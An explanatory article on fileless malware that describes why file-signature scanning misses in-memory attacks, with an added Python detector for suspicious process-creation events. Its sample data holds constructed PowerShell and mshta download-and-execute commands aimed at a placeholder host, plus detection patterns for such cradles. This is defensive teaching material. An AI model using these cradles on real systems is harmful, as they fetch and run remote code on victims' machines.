From an attacker’s point of view, there is often a direct correlation between likelihood of success and ability to evade detection. In other words, flying under the radar of their victims’ detection capabilities gives attackers an advantage.
That probably sounds obvious to most people – maybe even to the point of being trite – but it has a few less directly intuitive ramifications that are useful for organisations to know about.
For example, one of the current trends in the evolution of attacker “tradecraft” (the tools and methods attackers use to carry out their activities) is a surge in so-called fileless malware. This is malware that, as the name suggests, runs (propagates, executes and performs whatever function it is programmed to do) in volatile memory rather than as an executable written to disk. In practice it is usually launched through something that is already on the system, such as a script interpreter like PowerShell, a WMI subscription or a macro in a document, and any persistence it needs tends to live in the registry or a scheduled task rather than in a dropped binary.
It purposely avoids, ideally entirely, interacting with the filesystem, both in how it is delivered and in how it operates. Why? To maximise the likelihood of remaining undetected.
Keeping off the filesystem helps avoid detection because of the way many anti-malware tools work. At a fundamental level, the classic engine behaves much like the Unix/Linux search tool grep: it reads files as they are written, opened or scheduled for a scan, looks for byte patterns (signatures of known malware) and alerts when something matches.
To the degree that malware can do its job without ever creating a file, it gives a scanner of that kind nothing to read. The malware can therefore operate undetected for longer and has more time to accomplish its goal.
There are a few reasons why this should matter for organisations. First and foremost, it means the organisation may need to re-evaluate its existing tools: which tools it is using and how it employs them. For example, some have said that existing tools become “valueless” in a fileless context. That is purposely hyperbolic to make the point, but it is not entirely accurate.
Many anti-malware tools have detection capabilities that do not depend on file signatures, such as heuristics, behavioural analysis, memory scanning and hooks into script interpreters (on Windows, the Antimalware Scan Interface, AMSI, hands script content to the installed engine at run time, after any encoding or obfuscation has been undone). These can run alongside filesystem scanning. The catch is that using those features can require specific action by the customer: it is incumbent on users to check that the additional functionality is present in the tools they employ and, assuming it is, to ensure it is enabled and configured rather than left at a file-scan-only default.
The point is that existing anti-malware tools can still help, so this is not a “slash and burn what you’re using now” scenario. Also, fileless attacks are still the minority. They are increasing, but they remain less frequent than other kinds of attack.
For example, Barkly and Ponemon’s 2017 study State of endpoint security risk forecasts that in 2018, the percentage of fileless attacks will rise to 35%. While that is significant – and needs paying attention to – it also means existing file scanning approaches are not dead just yet.
However, it is important to recognise that this trend signifies a very real shift from a practical point of view – at least if we are going to keep our organisations protected in the best way possible. The fact that there is less ability for scanning products to operate optimally in a fileless context increases the importance of other protection methods and security hygiene practices to pick up the slack.
First, ensure that devices and the software they run are patched where possible, and that they are configured correctly and hardened: many fileless chains start with an exploit or with built-in tooling, so blocking macros in documents from the internet, restricting script interpreters and turning on script logging remove much of the attacker’s runway. Second, use other types of detective controls where we can, and be smart about how we use them. This could include increasing the scrutiny we give network traffic, and paying more attention to logs and alerts, in particular process-creation events recorded with their full command lines, since for a fileless attack the command line is often the only artefact that ever exists.
Lastly, to the extent that we can, stay alert to attacker activity – for example, being alert to adversary motivations, tradecraft and targets, and marrying that understanding to our systematic and workmanlike analysis and inspection of the environment.
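To make the contrast between the grep-style scanning described earlier and the log-based detective controls just listed concrete, here is an added example (not code from the article or from any product mentioned in it). It runs a pattern scanner over a constructed snapshot of files on disk, then runs a handful of behavioural checks over constructed process-creation records (parent image, image, command line). The signature strings, file contents and events are all invented for illustration; the PowerShell -EncodedCommand decoding and the parent/child relationships checked are the kind of logic a practitioner would actually put in a detection rule.

```python
"""Why file-signature scanning misses fileless tradecraft, and what catches it.

Added example, not from the article. The events, file contents and signature
strings below are constructed for illustration; the record shape (parent image,
image, command line) mirrors a process-creation event but these are not real logs.
"""
from __future__ import annotations

import base64
import re

# --- 1. A grep-style scanner: looks for known byte patterns in files on disk ---

# Constructed "signature database" (hypothetical names, not real AV signatures).
SIGNATURES = {
    "Cradle.Downloader": b"DownloadString(",
    "Dropper.Generic": b"FromBase64String(",
}

def signature_scan(files: dict[str, bytes]) -> list[tuple[str, str]]:
    """Return (path, signature name) for every on-disk file matching a pattern."""
    return [(path, name) for path, data in files.items()
            for name, pattern in SIGNATURES.items() if pattern in data]

# --- 2. Behavioural checks on process-creation telemetry; no file needed ---

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Strings that commonly appear in in-memory download-and-execute one-liners.
CRADLE_PATTERNS = [r"DownloadString\(", r"DownloadData\(", r"Invoke-Expression",
                   r"\bIEX\b", r"FromBase64String\(", r"Reflection\.Assembly"]

def basename(path: str) -> str:
    # Windows paths: split on backslash rather than os.path so this runs anywhere.
    return path.rsplit("\\", 1)[-1].lower()

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; this covers
# the common spellings (-e, -ec, -en, -enc, -encodedcommand). The argument is
# base64 of the script encoded as UTF-16LE.
ENC_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_event(ev: dict) -> list[str]:
    """Return the reasons an event looks like fileless tradecraft (empty if benign)."""
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    reasons = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image} (macro-style launch)")
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        reasons.append(f"WMI provider host spawned {image}")
    if image in {"powershell.exe", "pwsh.exe"}:
        script = decode_encoded_command(cmd)
        if script is not None:
            reasons.append("PowerShell launched with an encoded command")
        text = script if script is not None else cmd
        hits = [p for p in CRADLE_PATTERNS if re.search(p, text, re.I)]
        if hits:
            reasons.append("download/execute cradle in command: " + ", ".join(hits))
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
            reasons.append("hidden window requested")
    if image in {"mshta.exe", "regsvr32.exe", "rundll32.exe"} and re.search(r"https?://", cmd, re.I):
        reasons.append(f"{image} invoked with a URL argument")
    return reasons

def hunt(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that trips at least one check."""
    return [(i, r) for i, ev in enumerate(events) if (r := analyse_event(ev))]

# --- Constructed sample data --------------------------------------------------

# The sort of one-liner a macro or WMI subscription might launch (constructed).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {_ENCODED}"},
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/launch.hta"},
]

# Constructed snapshot of the only files those processes touched on disk. The
# cradle itself never lands there: it exists only in the command line and in memory.
SAMPLE_DISK = {
    r"C:\Users\alice\notes.txt": b"meeting at 10",
    r"C:\Users\alice\quarterly.docm": b"PK\x03\x04 (constructed placeholder for a macro document)",
}

if __name__ == "__main__":
    print("on-disk signature hits:", signature_scan(SAMPLE_DISK))
    for index, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(reasons))
```

Run as a script, the signature scan over the disk snapshot returns nothing, while the telemetry checks flag the Word-spawned encoded PowerShell (four reasons, including the decoded download cradle) and the WMI-spawned mshta.exe with a URL. The lesson is the one the article makes: once the payload is a command line rather than a file, the detection has to read process-creation logs, script logs or memory rather than the filesystem, and those sources only help if the telemetry (command lines in particular) is actually being collected.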
At the end of the day, though, a good starting point is just having an awareness that the issue exists. This gives us the ability to plan around the issue and ensure we are getting the most from the tools we use and the protections we have in place. It might cause us to ask pointed questions about the products and tools we use – and rethink how we approach monitoring within our environments.